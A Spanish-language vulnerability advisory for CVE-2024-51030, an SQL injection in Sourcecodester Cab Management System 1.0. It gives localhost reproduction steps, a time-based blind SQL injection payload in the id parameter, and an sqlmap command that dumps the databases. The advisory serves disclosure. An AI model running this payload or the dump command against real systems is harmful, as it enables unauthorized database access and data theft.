CVE-2024-51030
Descripción
Una vulnerabilidad de inyección SQL en manage_client.php y view_cab.php de Sourcecodester Cab Management System 1.0 permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro id, lo que conduce a acceso no autorizado y posible compromiso de datos sensibles dentro de la base de datos.
Tipo de Vulnerabilidad
Inyección SQL
Proveedor del Producto
Sourcecodester
Base de Código del Producto Afectado:
https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0
Componente Afectado:
El Sourcecodester Cab Management System v1.0 es vulnerable a inyección SQL a través del parámetro id en las páginas manage_client.php y view_cab.php.
Vectores de Ataque:
- Configure la aplicación localmente e inicie sesión utilizando las credenciales de administrador predeterminadas proporcionadas o también puede iniciar sesión utilizando un usuario administrador con pocos privilegios (como staff).
- Ahora, navegue a la siguiente URL en su navegador: http://localhost/cms/admin/?page=clients/manage_client&id=1
- Inyecte el Payload SQL: Modifique el parámetro id en la URL para incluir un payload de inyección SQL ciega basada en booleano o basada en tiempo: http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
- Observe la Respuesta de la Aplicación: La página debería tardar notablemente más (5 segundos) en cargar si la inyección es exitosa, confirmando que el parámetro id es vulnerable a inyección SQL.
- Ahora use la herramienta SQLMap para una mayor explotación y volcado de bases de datos usando el siguiente comando: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
Referencias:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection